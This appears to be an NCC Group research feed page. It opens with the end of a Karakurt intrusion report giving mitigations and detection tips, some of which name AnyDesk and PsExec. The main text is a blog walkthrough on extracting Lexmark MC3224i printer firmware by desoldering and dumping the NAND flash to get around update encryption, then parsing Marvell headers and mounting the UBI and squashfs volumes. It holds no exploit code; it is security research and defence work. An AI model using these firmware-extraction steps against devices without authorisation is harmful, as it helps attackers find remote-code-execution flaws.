Once the discovery actions have been completed Karakurt appeared to leave the environment before re-entering and identifying servers with access to sensitive victim data on file shares. Once such a server is identified a secondary persistence mechanism was utilised in the form of the remote desktop software AnyDesk allowing Karakurt access even if the VPN access was removed.  

On the same server that AnyDesk is installed Karakurt have been identified browsing folders local to the server and on file shares.   

7-Zip archives have then been created on the server.  

In the cases investigated there were no firewall logs or other evidence to confirm the data was then exfiltrated but based on the claims from Karakurt along with the file tree text file provided as proof, it is strongly believed that the data was exfiltrated in all cases investigated. 

It is suspected that Karakurt are utilising Rclone to exfiltrate data to cloud data hosting providers. This technique was discussed in a previous NCC Group blog, Detecting Rclone – An Effective Tool for Exfiltration 

Mitigations  

  • To remove the threat immediately multi-factor authentication should be implemented for VPN access using a Fortinet VPN.  
  • Ensure all Domain Controllers are fully patched and patch for critical vulnerabilities generally. 

Detection  

  • Look for evidence of the hosts authenticating from the VPN pool with the naming convention used as default for Windows hosts, for example DESKTOP-XXXXXX. 
  • Check for event log 3150 in the Microsoft-Windows-DNS-Server-Service Event Log. 
  • Check for unauthorised use of AnyDesk or PsExec in the environment. 
✇NCC Group Research

Bypassing software update package encryption – extracting the Lexmark MC3224i printer firmware (part 1)

By: Catalin Visinescu

Summary

On November 3, 2021, Zero Day Initiative Pwn2Own announced that NCC Group EDG (Exploit Development Group) remotely exploited a vulnerability in the MC3224i printer firmware that offered full control over the device. Note that for Pwn2Own the printer was running the latest version of the firmware, CXLBL.075.272.
Listed as one of the targets of Austin 2021 Pwn2Own, the Lexmark MC3224i is a popular all-in-one color laser printer with great reviews on various sellers’ websites.

The vulnerability has now been addressed by Lexmark and the ZDI advisory available here. Part 2 will contain more information on the vulnerability and exploitation.

Lexmark encrypts the firmware update packages provided to consumers, making the binary analysis more difficult. With little over a month of research time assigned and few targets to look at, NCC Group decided to remove the flash memory and extract the firmware using a programmer, firmware which we (correctly) assumed would be stored unencrypted. This allowed us to bypass the firmware update package encryption. With the firmware extracted, the binaries could be reverse-engineered to find vulnerabilities that would allow remote code execution.

Extracting the firmware from the flash

PCB overview

The main printed circuit board (PCB) is located on the left side of the printer. The device is powered by a Marvell 88PA6220-BUX2 System-on-Chip (SoC) which is specially designed for the printer industry and a Micron MT29F2G08ABAGA NAND flash (2Gb i.e. 256MB) for firmware storage. The NAND flash can be easily located on the lower left side of the PCB:

Serial output

The UART connector was quickly identified, which is labeled JRIP1 on the PCB:

Three wires were soldered with the intent to:

  • review the boot log to understand the flash layout by observing the device’s partition information
  • scan the boot log for any indications that software signature verification is performed by the printer
  • hope to get a shell in either the bootloader (U-Boot) or the OS (Linux)

The serial output (115200 baud) of the printer’s boot process is shown below:

Si Ge2-RevB 3.3.22-9h 12 14 25
TIME=Tue Mar 10 21:02:36 2020;COMMIT=863d60b
uidc
Failure Enabling AVS workaround on 88PG870
setting AVS Voltage to 1050
Bank5 Reg2 = 0x0000381E, VoltBin = 0, efuseEscape = 0
AVS efuse Values:
Efuse Programed = 1
Low VDD Limit = 32
High VDD Limit = 32
Target DRO = 65535
Select Vsense0 = 0
a
Calling Configure_Flashes @ 0xFFE010A8 12 FE 13 E0026800
fves
DDR3 400MHz 1x16 4Gbit
rSHA compare Passed 0
SHA compare Passed 0
l
Launch AP Core0 @ 0x00100000
U-Boot 2018.07-AUTOINC+761a3261e9 (Feb 28 2020 - 23:26:43 +0000)
DRAM: 512 MiB
NAND: 256 MiB
MMC: mv_sdh: 0, mv_sdh: 1, mv_sdh: 2
lxk_gen2_eeprom_probe:123: No panel eeprom option found.
lxk_panel_notouch_probe_gen2:283: panel uicc type 68, hw vers 19, panel id 98, display type 11, firmware v4.5, lvds 4
found smpn display TM024HDH49 / ILI9341 default
lcd_lvds_pll_init: Requesting dotclk=40000000Hz
found smpn display Yeebo 2.8 B
ubi0: default fastmap pool size: 100
ubi0: default fastmap WL pool size: 50
ubi0: attaching mtd1
ubi0: attached by fastmap
ubi0: fastmap pool size: 100
ubi0: fastmap WL pool size: 50
ubi0: attached mtd1 (name "mtd=1", size 253 MiB)
ubi0: PEB size: 131072 bytes (128 KiB), LEB size: 126976 bytes
ubi0: min./max. I/O unit sizes: 2048/2048, sub-page size 2048
ubi0: VID header offset: 2048 (aligned 2048), data offset: 4096
ubi0: good PEBs: 2018, bad PEBs: 8, corrupted PEBs: 0
ubi0: user volume: 7, internal volumes: 1, max. volumes count: 128
ubi0: max/mean erase counter: 2/1, WL threshold: 4096, image sequence number: 0
ubi0: available PEBs: 0, total reserved PEBs: 2018, PEBs reserved for bad PEB handling: 32
Loading file '/shared/pm/softoff' to addr 0x1f6545d4...
Unmounting UBIFS volume InternalStorage!
Card did not respond to voltage select!
bootcmd: setenv cramfsaddr 0x1e900000;ubi read 0x1e900000 Kernel 0xa67208;sha256verify 0x1e900000 0x1f367000 1;cramfsload 0x100000 /main.img;source 0x100000;loop.l 0xd0000000 1
Read 10908168 bytes from volume Kernel to 1e900000
Code authentication success
### CRAMFS load complete: 2165 bytes loaded to 0x100000
## Executing script at 00100000
### CRAMFS load complete: 4773416 bytes loaded to 0xa00000
### CRAMFS load complete: 4331046 bytes loaded to 0x1600000
## Booting kernel from Legacy Image at 00a00000 ...
Image Name: Linux-4.17.19-yocto-standard-74b
Image Type: ARM Linux Kernel Image (uncompressed)
Data Size: 4773352 Bytes = 4.6 MiB
Load Address: 00008000
Entry Point: 00008000
## Loading init Ramdisk from Legacy Image at 01600000 ...
Image Name: initramfs-image-granite2-2020063
Image Type: ARM Linux RAMDisk Image (uncompressed)
Data Size: 4330982 Bytes = 4.1 MiB
Load Address: 00000000
Entry Point: 00000000
## Flattened Device Tree blob at 01500000
Booting using the fdt blob at 0x1500000
Loading Kernel Image ... OK
Using Device Tree in place at 01500000, end 01516aff
UPDATING DEVICE TREE WITH st:1fec4000 sz: 12c000
Starting kernel ...
Booting Linux on physical CPU 0xffff00
Linux version 4.17.19-yocto-standard-74b7175b2a3452f756ffa76f750e50db ([email protected]) (gcc version 7.3.0 (GCC)) #1 SMP PREEMPT Mon Jun 29 19:46:01 UTC 2020
CPU: ARMv7 Processor [410fd034] revision 4 (ARMv7), cr=30c5383d
CPU: div instructions available: patching division code
CPU: PIPT / VIPT nonaliasing data cache, VIPT aliasing instruction cache
OF: fdt: Machine model: mv6220 Lionfish 00d L
earlycon: early_pxa0 at MMIO32 0x00000000d4030000 (options '')
bootconsole [early_pxa0] enabled
FIX ignoring exception 0xa11 addr=fb7ffffe swapper/0:1
...

On other devices NCC Group reviewed in the past, access to UART pins sometimes offered a full Linux shell. On the MC3224i the UART RX pin did not appear to be enabled, therefore we were only able to view the boot log, but not interact with the system. It may be possible that the pin is disabled through e-fuses on the SoC. Alternatively, a zero-ohm resistor may has been removed from the PCB on production devices, in which case it may be possible to re-enable it. Since our main goal was to remove the flash and extract the firmware, we did not investigate this further.

Dumping the firmware from the flash

Removing and dumping (or reprogramming) flash memory is a lot easier to accomplish than most people realize and the benefits are great: it often allows us to enable debug, obtain access to a shell, read sensitive keys, and in some cases bypass firmware signature verification. In our case though the goal was to extract the file system and to reverse-engineer the binaries as Pwn2Own rules clearly specified that only remotely executed exploits were acceptable. Still, there are no restrictions placed on the exploit development efforts. It is important to think of the development and execution of the exploit as separate efforts. While the execution effort dictates the scalability of an attack and cost to the attacker, the development effort (or NRE) need only be expended once for success, and so may reasonably consume sacrificial devices and a great deal of time without affecting the execution effort. It is the defender’s job to increase the execution effort.

Removing the flash was straightforward using a hot air rework station. After cleaning the pins we used a TNM5000 programmer with a TSOP-48 adapter to read the contents of the flash. We ensured the flash memory is properly seated in the adapter, selected the correct flash identifier and proceeded to reading the full content of the flash and saved it to a file. Re-attaching the flash needs to be done carefully to ensure a functional device. The entire process took about an hour, including testing the connections under a microscope. The printer booted successfully, hooray! The easy part was done…

The dumped flash image is exactly 285,212,672 bytes long, which is more than 268,435,456 bytes in 256MB. This is because the raw read of the flash includes spare areas, also referred to as page OOB (out-of-band) data areas. From the Micron spreadsheet:

Internal ECC enables 9-bit detection and 8-bit correction in 528 bytes (x8) of main area and 16 bytes (x8) of spare area. […]
During a PROGRAM operation, the device calculates an ECC code on the 2k page in the cache register, before the page is written to the NAND Flash array. The ECC code is stored in the spare area of the page.
During a READ operation, the page data is read from the array to the cache register, where the ECC code is calculated and compared with the ECC code value read from the array. If a 1- to 8-bit error is detected, the error is corrected in the cache register. Only corrected data is output on the I/O bus.

The NAND flash memory is programmed and read using a page-based granularity. A page is made up of 2048 bytes of usable storage space and 128 bytes of OOB used to store the error correction codes and flags for bad block management, for a total of 2,176 bytes.
The erase operation has block-based granularity. According to the Micron’s documentation, for this flash part one block is made up of 64 pages, for a total of 128KB usable data.
The flash has two planes, each containing 1024 blocks. Putting everything together:

2 planes * 1024 blocks/plane * 64 pages/block * (2048 + 128) bytes/page = 285,212,672

Since the spare area is only required for flash-management use and does not contains useful user data, we wrote a small script that drops the 128 bytes of OOB data after each 2048-byte page. The resulting file is exactly 256MB.

Analyzing the dumped firmware

Extracting the Marvell images

Remember we said the printer is powered by a Marvell chipset? This is when that information comes handy. While the 88PA6220 was specially designed for the printer industry, the firmware image format looks to be identical to that of other Marvell SoCs. As such there are many documents from similar processors or code on GitHub that can be used as reference. For instance we see that the image starts with a TIM (Trusted Image Module) header. The header contains a great deal of information about other images, some of which was used to extract the individual images as we shall see in this section of the blog:

The TIM header format is presented below in the last structure (obviously, it assumes the OOB data has already been removed):

typedef struct {
unsigned int Version;
unsigned int Identifier;
unsigned int Trusted;
unsigned int IssueDate;
unsigned int OEMUniqueID;
} VERSION_I;
typedef struct {
unsigned int Reserved[5];
unsigned int BootFlashSign;
} FLASH_I, *pFLASH_I;
// Constant part of the header
typedef struct {
{
VERSION_I VersionBind;
FLASH_I FlashInfo;
unsigned int NumImages;
unsigned int NumKeys;
unsigned int SizeOfReserved;
} CTIM, *pCTIM;
typedef struct {
uint32_t ImageID; // Indicate which Image
uint32_t NextImageID; // Indicate next image in the chain
uint32_t FlashEntryAddr; // Block numbers for NAND
uint32_t LoadAddr;
uint32_t ImageSize;
uint32_t ImageSizeToHash;
HASHALGORITHMID_T HashAlgorithmID; // See HASHALGORITHMID_T
uint32_t Hash[16]; // Reserve 512 bits for the hash
uint32_t PartitionNumber;
} IMAGE_INFO_3_4_0, *pIMAGE_INFO_3_4_0; // 0x60 bytes
typedef struct {
unsigned intKeyID;
unsigned int HashAlgorithmID;
unsigned int ModulusSize;
unsigned int PublicKeySize;
unsigned int RSAPublicExponent[64];
unsigned int RSAModulus[64];
unsigned int KeyHash[8];
} KEY_MOD, *pKEY_MOD;
typedef struct {
pCTIM pConsTIM; // Constant part
pIMAGE_INFO pImg; // Pointer to Images (v 3.4.0)
pKEY_MOD pKey; // Pointer to Keys
unsigned int *pReserved; // Pointer to Reserved Area
pPLAT_DS pTBTIM_DS; // Pointer to Digital Signature
} TIM;

As detailed below, the processor was secured by the Lexmark team, so let’s take a look at some of the relevant fields that help us extract the images. For a complete description of each field please refer to this Reference Manual:

  • VERSION_I – general TIM header informations.
    • Version (0x00030400) – TIM header version (3.4.0). This is useful later to identify which version of Image Info structure (IMAGE_INFO_3_4_0) is used.
    • Identifier (0x54494D48) – always ASCII "TIMH", a constant string used to identify a valid header.
    • Trusted (0x00000001) – 0 for insecure processors, 1 for secure. The processor has been secured by Lexmark therefore only signed firmware is allowed to run on these devices.
  • FLASH_I – boot flash properties.
  • NumImages (0x00000004) – indicates there are four structures in the header that describe images making up the firmware.
  • NumKeys (0x00000001) – one key information structure is present in this header.
  • SizeOfReserved (0x00000000) – just before the signature at the end of the TIM header, the OEM can reserve up to 4KB – sizeof(TIMH) for their use. Lexmark is not using this feature.
  • IMAGE_INFO_3_4_0 – image 1 information.
    • ImageID (0x54494D48) – id of image ("TIMH"), TIM header in this case.
    • NextImageID (0x4F424D49) – id of following image ("OBMI"), OEM Boot Module Image.
    • FlashEntryAddr (0x00000000) – index in flash memory where the TIM header is located.
    • ImageSize (0x00000738) – the size of the image, 1,848 bytes for the header.
  • IMAGE_INFO_3_4_0 – image 2 information.
    • ImageID (0x4F424D49) – id of image ("OBMI"), OEM Boot Module Image. Provided by Marvell, the OBM is responsible for tasks needed to boot the printer. Looking at the UART boot log, everything that displayed before the U-Boot start message is displayed by the OBM code. As for functionality, the OBM sets up DDR and the Application Processor Core 0 and performs firmware signature verification of the firmware loaded subsequently (U-Boot).
    • NextImageID (0x4F534C4F) – id of following image ("OSLO").
    • FlashEntryAddr (0x00001000) – index in flash memory where OBMI is located.
    • ImageSize (0x0000FD40) – the size of the image, 64,832 bytes for OBMI.
  • IMAGE_INFO_3_4_0 – image 3 information.
    • ImageID (0x4F534C4F) – id of image ("OSLO"), contains U-Boot code.
    • NextImageID (0x54524458) – id of following image ("TRDX").
    • FlashEntryAddr (0x000C0000) – index in flash memory where OSLO image is located.
    • ImageSize (0x000712FF) – the size of the image, 463,615 bytes for OSLO.
  • IMAGE_INFO_3_4_0 – image 4 information.
    • ImageID (0x54524458) – id of image ("TRDX"), contains Linux kernel and device tree image (likely used for recovery).
    • NextImageID (0xFFFFFFFF) – id of following image, this value signals no more images are following.
    • FlashEntryAddr (0x00132000) – index in flash memory where TRDX image is located.
    • ImageSize (0x000E8838) – the size of the image, 952,376 bytes for TRDX.

Of course, these Marvell images make up only a small fraction of the flash size. Looking past these images we have recognized the UBI erase block signature "UBI#" showing up every 131,072 bytes, i.e. 128KB, i.e. every flash block (1 block * 64 pages/block * 2048-bytes/page). In total we shall see that there were 2,024 UBI blocks resulting in a file (we named it ubi_data.bin) that is 253MB in size.

$ file ubi_data.bin 
ubi_data.bin: UBI image, version 1

We expect this file to contain the interesting material we are after.

Extracting the UBI volumes

Ok, so we have an UBI image (named ubi_data.bin) that contains all the UBI blocks:

What now? First a bit more about UBI…
The first four bytes of the first page of each erase block starts with "UBI#", as mentioned above. This shows that the first page is occupied by the erase count header which contains stats used for wear-protection operations. If the block contains user data, the second page in the block is occupied by the volume header (starts with "UBI!"). As the first two pages of each block contain metadata, only 62 of the 64 pages (124KB) store user data, a little less than the expected 128KB.

Let’s see what’s inside using the ubi_read tool:

  • 2024 erase blocks
  • 1302 blocks used for data (part of a volume), represents the block count sum for all volumes
  • seven volumes: Kernel, Base, Copyright, Engine, InternalStorage, MBR, ManBlock
$ ubireader_display_info ubi_data.bin 
UBI File
---------------------
	Min I/O: 2048
	LEB Size: 126976
	PEB Size: 131072
	Total Block Count: 2024
	Data Block Count: 1302
	Layout Block Count: 2
	Internal Volume Block Count: 1
	Unknown Block Count: 719
	First UBI PEB Number: 2.0

	Image: 0
	---------------------
		Image Sequence Num: 0
		Volume Name:Kernel
		Volume Name:Base
		Volume Name:Copyright
		Volume Name:Engine
		Volume Name:InternalStorage
		Volume Name:MBR
		Volume Name:ManBlock
		PEB Range: 0 - 2023

		Volume: Kernel
		---------------------
			Vol ID: 2
			Name: Kernel
			Block Count: 95

			Volume Record
			---------------------
				alignment: 1
				crc: '0x8abc33f6'
				data_pad: 0
				errors: ''
				flags: 0
				name: 'Kernel'
				name_len: 6
				padding: '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
				rec_index: 2
				reserved_pebs: 133
				upd_marker: 0
				vol_type: 'dynamic'

		Volume: Base
		---------------------
			Vol ID: 3
			Name: Base
			Block Count: 927

			Volume Record
			---------------------
				alignment: 1
				crc: '0xc3f30751'
				data_pad: 0
				errors: ''
				flags: 0
				name: 'Base'
				name_len: 4
				padding: '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
				rec_index: 3
				reserved_pebs: 1132
				upd_marker: 0
				vol_type: 'dynamic'

		Volume: Copyright
		---------------------
			Vol ID: 4
			Name: Copyright
			Block Count: 1

			Volume Record
			---------------------
				alignment: 1
				crc: '0xa065ca'
				data_pad: 0
				errors: ''
				flags: 0
				name: 'Copyright'
				name_len: 9
				padding: '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
				rec_index: 4
				reserved_pebs: 3
				upd_marker: 0
				vol_type: 'dynamic'

		Volume: Engine
		---------------------
			Vol ID: 15
			Name: Engine
			Block Count: 21

			Volume Record
			---------------------
				alignment: 1
				crc: '0x66c80b4b'
				data_pad: 0
				errors: ''
				flags: 0
				name: 'Engine'
				name_len: 6
				padding: '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
				rec_index: 15
				reserved_pebs: 34
				upd_marker: 0
				vol_type: 'dynamic'

		Volume: InternalStorage
		---------------------
			Vol ID: 24
			Name: InternalStorage
			Block Count: 256

			Volume Record
			---------------------
				alignment: 1
				crc: '0x962ca517'
				data_pad: 0
				errors: ''
				flags: 0
				name: 'InternalStorage'
				name_len: 15
				padding: '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
				rec_index: 24
				reserved_pebs: 674
				upd_marker: 0
				vol_type: 'dynamic'

		Volume: MBR
		---------------------
			Vol ID: 90
			Name: MBR
			Block Count: 1

			Volume Record
			---------------------
				alignment: 1
				crc: '0x5fee82ff'
				data_pad: 0
				errors: ''
				flags: 0
				name: 'MBR'
				name_len: 3
				padding: '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
				rec_index: 90
				reserved_pebs: 2
				upd_marker: 0
				vol_type: 'static'

		Volume: ManBlock
		---------------------
			Vol ID: 91
			Name: ManBlock
			Block Count: 1

			Volume Record
			---------------------
				alignment: 1
				crc: '0x28cd6521'
				data_pad: 0
				errors: ''
				flags: 0
				name: 'ManBlock'
				name_len: 8
				padding: '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
				rec_index: 91
				reserved_pebs: 2
				upd_marker: 0
				vol_type: 'static'

Ok, now to extract the seven volumes mentioned above in the ubi_data_bin_extracted folder:

$ ubireader_extract_images ubi_data.bin -v -o ubi_data_bin_extracted
$ ls -lh ubi_data_bin_extracted/ubi_data.bin/
-rw-rw-r-- 1 cvisinescu cvisinescu 113M Jan 17 19:10 img-0_vol-Base.ubifs
-rw-rw-r-- 1 cvisinescu cvisinescu 124K Jan 17 19:10 img-0_vol-Copyright.ubifs
-rw-rw-r-- 1 cvisinescu cvisinescu 2.6M Jan 17 19:10 img-0_vol-Engine.ubifs
-rw-rw-r-- 1 cvisinescu cvisinescu  49M Jan 17 19:10 img-0_vol-InternalStorage.ubifs
-rw-rw-r-- 1 cvisinescu cvisinescu  12M Jan 17 19:10 img-0_vol-Kernel.ubifs
-rw-rw-r-- 1 cvisinescu cvisinescu 124K Jan 17 19:10 img-0_vol-ManBlock.ubifs
-rw-rw-r-- 1 cvisinescu cvisinescu 124K Jan 17 19:10 img-0_vol-MBR.ubifs

The volumes represent partitions used by the device, some of which are file systems:

$ file *.ubifs
img-0_vol-Base.ubifs:            Squashfs filesystem, little endian, version 1024.0, compressed, 4280940851934265344 bytes, -1506476032 inodes, blocksize: 512 bytes, created: Sun Nov  5 14:27:44 2034
img-0_vol-Copyright.ubifs:       data
img-0_vol-Engine.ubifs:          Squashfs filesystem, little endian, version 1024.0, compressed, 7678397671131840512 bytes, 1610612736 inodes, blocksize: 512 bytes, created: Sat Nov 14 21:23:44 2026
img-0_vol-InternalStorage.ubifs: UBIfs image, sequence number 1, length 4096, CRC 0x44d52349
img-0_vol-Kernel.ubifs:          Linux Compressed ROM File System data, little endian size 11939840 version #2 sorted_dirs CRC 0x35eb963f, edition 0, 4424 blocks, 191 files
img-0_vol-ManBlock.ubifs:        data
img-0_vol-MBR.ubifs:             DOS/MBR boot sector; partition 1 : ID=0xff, active 0xff, start-CHS (0x3ff,255,63), end-CHS (0x3ff,255,63), startsector 4294967295, 4294967295 sectors; partition 2 : ID=0xff, active 0xff, start-CHS (0x3ff,255,63), end-CHS (0x3ff,255,63), startsector 4294967295, 4294967295 sectors; partition 3 : ID=0xff, active 0xff, start-CHS (0x3ff,255,63), end-CHS (0x3ff,255,63), startsector 4294967295, 4294967295 sectors; partition 4 : ID=0xff, active 0xff, start-CHS (0x3ff,255,63), end-CHS (0x3ff,255,63), startsector 4294967295, 65535 sectors

Accessing the user data (writable partition)

This section describes how to mount img-0_vol-InternalStorage.ubifs which is a UBIFS image. To do so, a number of steps must be performed.

We will first need to load the NAND flash simulator kernel module. This module uses RAM to imitate physical NAND flash devices. Check for the appearance of /dev/mtd0 and /dev/mtd0ro and the output of dmesg on the Linux machine after running the following command. The four bytes represent the values returned by the READ ID flash command (0x90), but also available in the Micron NAND flash datasheet in the "Read ID Parameters for Address 00h" table:

$ sudo modprobe nandsim first_id_byte=0x2C second_id_byte=0xDA third_id_byte=0x90 fourth_id_byte=0x95
$ ls -l /dev/mtd*

The simulated NAND flash is 256MB and each erase block is 128KB, which matches the physical flash. Since we are only mounting one volume of 49MB, space should not be a problem:

$ cat /proc/mtd 
dev:    size   erasesize  name
mtd0: 10000000 00020000 "NAND simulator partition 0"
$ dmesg | grep "nand:"
[50027.712675] nand: device found, Manufacturer ID: 0x2c, Chip ID: 0xda
[50027.712677] nand: Micron NAND 256MiB 3,3V 8-bit
[50027.712678] nand: 256 MiB, SLC, erase size: 128 KiB, page size: 2048, OOB size: 64

Note that the OOB size reported by dmesg is 64 bytes which is incorrect, since it should have been 128 bytes. However, since we are simulating the NAND flash in RAM this is not an issue. At the time of this writing nandsim does not support the model of Micron NAND flash used by the printer.

Next, let us erase all the blocks from start to end. For more details run flash_erase --help:

$ sudo flash_erase /dev/mtd0 0 0
Erasing 128 Kibyte @ ffe0000 -- 100 % complete

With all simulated NAND flash blocks erased, let’s format the partition. The first parameter specifies the minimum input/output unit, in our case one page. The second specifies offset of the volume id, in our case 2048 bytes into the UBI erase block, as presented earlier in this section of the blog.

$ sudo ubiformat /dev/mtd0 -s 2048 -O 2048
ubiformat: mtd0 (nand), size 268435456 bytes (256.0 MiB), 2048 eraseblocks of 131072 bytes (128.0 KiB), min. I/O size 2048 bytes
libscan: scanning eraseblock 2047 -- 100 % complete  
ubiformat: 2048 eraseblocks are supposedly empty
ubiformat: formatting eraseblock 2047 -- 100 % complete

There is one more kernel module we need to load:

$ sudo modprobe ubi
$ ls -l /dev/ubi_ctrl

The following command attaches /dev/mtd0 to UBI. The first parameter indicates which MTD device (i.e. /dev/mtd0) is used. The second indicates the UBI device to be created (i.e. /dev/ubi0), which is used to access the UBI volume. The third parameter specifies again the offset of the volume id.

$ sudo ubiattach -m 0 -d 0 -O 2048
UBI device number 0, total 2048 LEBs (260046848 bytes, 248.0 MiB), available 2002 LEBs (254205952 bytes, 242.4 MiB), LEB size 126976 bytes (124.0 KiB)
$ ls -l /dev/ubi0

Now we create a volume which we will name my_volume_InternalStorage and access via /dev/ubi0_0 (first volume on device). The command below allocating a volume equal to the size of the partition fails because, as mentioned earlier, two pages per erase block are used for the UBI and volume headers. As such, for each 128KB UBI erase block 4KB are lost. We can however create a volume that is 240MB (i.e. 1982 erase blocks * 124 KB/erase block), much larger than our img-0_vol-InternalStorage.ubifs volume which is 49MB:

$ sudo ubimkvol /dev/ubi0 -N my_volume_InternalStorage -s 256MiB
ubimkvol: error!: cannot UBI create volume
          error 28 (No space left on device)

$ sudo ubimkvol /dev/ubi0 -N my_volume_InternalStorage -s 240MiB
Volume ID 0, size 1982 LEBs (251666432 bytes, 240.0 MiB), LEB size 126976 bytes (124.0 KiB), dynamic, name "my_volume_InternalStorage", alignment 1
$ ls -l /dev/ubi0_0

Additional information about the UBI device can be obtained using ubinfo /dev/ubi0 and ubinfo /dev/ubi0_0. Now to put the extracted volume image in the UBI device 0 and volume 0:

$ ubiupdatevol /dev/ubi0_0 img-0_vol-InternalStorage.ubifs

Finally, we can mount the UBI device using the mount command below. Alternatively, sudo mount -t ubifs ubi0:my_volume_InternalStorage mnt/ can also be used:

$ mkdir mnt
$ sudo mount -t ubifs ubi0_0 mnt/
$ ls -l mnt/
drwxr-xr-x  2 root root  160 Mar  2  2020 bookmarkmgr
drwxr-xr-x  2 root root  232 Mar  2  2020 http
drwxr-xr-x  2 root root  400 Sep 10 15:21 iq
drwxr-xr-x  2 root root  160 Mar  2  2020 log
drwxr-xr-x  2 root root  160 Mar  2  2020 nv2
-rw-r--r--  1 root root    0 Mar  2  2020 sb-dbg
drwxr-xr-x  6 root root  424 Mar  2  2020 security
drwxr-xr-x 41 root root 2816 Mar 16  2021 shared
drwxr-xr-x  2 root root  224 Mar  2  2020 thinscan

In this file system we find data such as the following:

  • auth database, contains user account from when we first set up the printer (username and hash of password)
  • some public and encrypted private certificates
  • calibration data

To undo everything, we run the following commands:

$ sudo umount mnt/
$ sudo ubirmvol /dev/ubi0 -n 0
$ sudo ubidetach -m 0
$ sudo modprobe -r ubifs
$ sudo modprobe -r ubi
$ sudo modprobe -r nandsim

Accessing the printer binaries (read-only partition)

This section describes how to extract the content of img-0_vol-Base.ubifs which we found it holds the binaries most interesting for us to reverse engineer:

$ unsquashfs img-0_vol-Base.ubifs
$ ls -l Base_squashfs_dir
drwxr-xr-x  2 cvisinescu cvisinescu 4096 Jun 22  2021 bin
drwxr-xr-x  2 cvisinescu cvisinescu 4096 Jun 22  2021 boot
-rw-r--r--  1 cvisinescu cvisinescu  909 Jun 22  2021 Build.Info
drwxr-xr-x  2 cvisinescu cvisinescu 4096 Mar 11  2021 dev
drwxr-xr-x 53 cvisinescu cvisinescu 4096 Jun 22  2021 etc
drwxr-xr-x  6 cvisinescu cvisinescu 4096 Jun 22  2021 home
drwxr-xr-x  8 cvisinescu cvisinescu 4096 Jun 22  2021 lib
drwxr-xr-x  2 cvisinescu cvisinescu 4096 Mar 11  2021 media
drwxr-xr-x  2 cvisinescu cvisinescu 4096 Mar 11  2021 mnt
drwxr-xr-x  5 cvisinescu cvisinescu 4096 Jun 22  2021 opt
drwxr-xr-x  2 cvisinescu cvisinescu 4096 Jun 22  2021 pkg-netapps
dr-xr-xr-x  2 cvisinescu cvisinescu 4096 Mar 11  2021 proc
drwx------  4 cvisinescu cvisinescu 4096 Jun 22  2021 root
drwxr-xr-x  2 cvisinescu cvisinescu 4096 Mar 11  2021 run
drwxr-xr-x  2 cvisinescu cvisinescu 4096 Jun 22  2021 sbin
drwxr-xr-x  2 cvisinescu cvisinescu 4096 Mar 11  2021 srv
dr-xr-xr-x  2 cvisinescu cvisinescu 4096 Mar 11  2021 sys
drwxrwxrwt  2 cvisinescu cvisinescu 4096 Mar 11  2021 tmp
drwxr-xr-x 10 cvisinescu cvisinescu 4096 Apr 18  2021 usr
drwxr-xr-x 13 cvisinescu cvisinescu 4096 Mar 16  2021 var
lrwxrwxrwx  1 cvisinescu cvisinescu   14 Jun 14  2021 web -> /usr/share/web

Success… now that we have the binaries, we can begin the task of reverse engineering them and understand how the printer works: vulnerabilities included. Part 2 of this blog will further show the reader the process used to finally compromise the printer.

Wrapping up

In summary, the image on the NAND flash memory looks as follows:

  • TIMH – Trusted Image Module header, Marvell-specific
  • OBMI – first bootloader, written by Marvell
  • OSLO – second bootloader (U-Boot)
  • TRDX – Linux kernel and device tree
  • UBI image
    • Base – squashfs filesystem for binaries
    • Copyright – raw data
    • Engine – squashfs filesystem contains some kernel modules for motors, belt, fan, etc.
    • InternalStorage – UBI FS image for user data (writable)
    • Kernel – compressed Linux kernel
    • ManBlock – raw data, empty partititon
    • MBR – Master Boot Record, contains information about partitions: Base, Copyright, Engine, InternalStorage and Kernel

As a side note…

During the early days of the project we first tried to modify parts of the firmware image (including the error correction code in the spare areas). The end goal was to perform dynamic testing on a live system and eventually obtain a shell which we could use to dump the binaries, view running processes, review file permissions, and understand how the Lexmark firmware works in general. It required repeated programming of the flash. While we can reliably re-attach the flash on the PCB multiple times, each attempt carries a risk of damage to both the chip and the PCB pads on which it is mounted.
Ordering replacement flash parts from the common vendors was not an option due to chip shortages. As such we attempted to create a contraption that would help us use the TSOP-48 adapter directly, basically a poor man’s chip socket.

The connections were good, but the device would not boot past U-Boot (as observed over serial) for reasons we did not understand:

Si Ge2-RevB 3.3.22-9h 12 14 25
TIME=Tue Jun 08 20:32:27 2021;COMMIT=863d60b
uidc
Failure Enabling AVS workaround on 88PG870
setting AVS Voltage to 1050
Bank5 Reg2 = 0x000038E4, VoltBin = 0, efuseEscape = 0
AVS efuse Values:
Efuse Programed = 1
Low VDD Limit = 31
High VDD Limit = 31
Target DRO = 65535
Select Vsense0 = 0
a
Calling Configure_Flashes @ 0xFFE010A8 12 FE 13 E0026800
fves
DDR3 400MHz 1x16 4Gbit
rSHA compare Passed 0
SHA compare Passed 0
l
Launch AP Core0 @ 0x00100000
U-Boot 2018.07-AUTOINC+761a3261e9 (Jun 08 2021 - 20:32:14 +0000)
DRAM: 512 MiB
NAND: 256 MiB
MMC: mv_sdh: 0, mv_sdh: 1, mv_sdh: 2
lxk_gen2_eeprom_probe:123: No panel eeprom option found.
lxk_panel_notouch_probe_gen2:283: panel uicc type 68, hw vers 19, panel id 98, display type 11, firmware v4.5, lvds 4
found smpn display TM024HDH49 / ILI9341 default
lcd_lvds_pll_init: Requesting dotclk=40000000Hz
found smpn display Yeebo 2.8 B
ubi0: default fastmap pool size: 100
ubi0: default fastmap WL pool size: 50
ubi0: attaching mtd1
ubi0: attached by fastmap
ubi0: fastmap pool size: 100
ubi0: fastmap WL pool size: 50
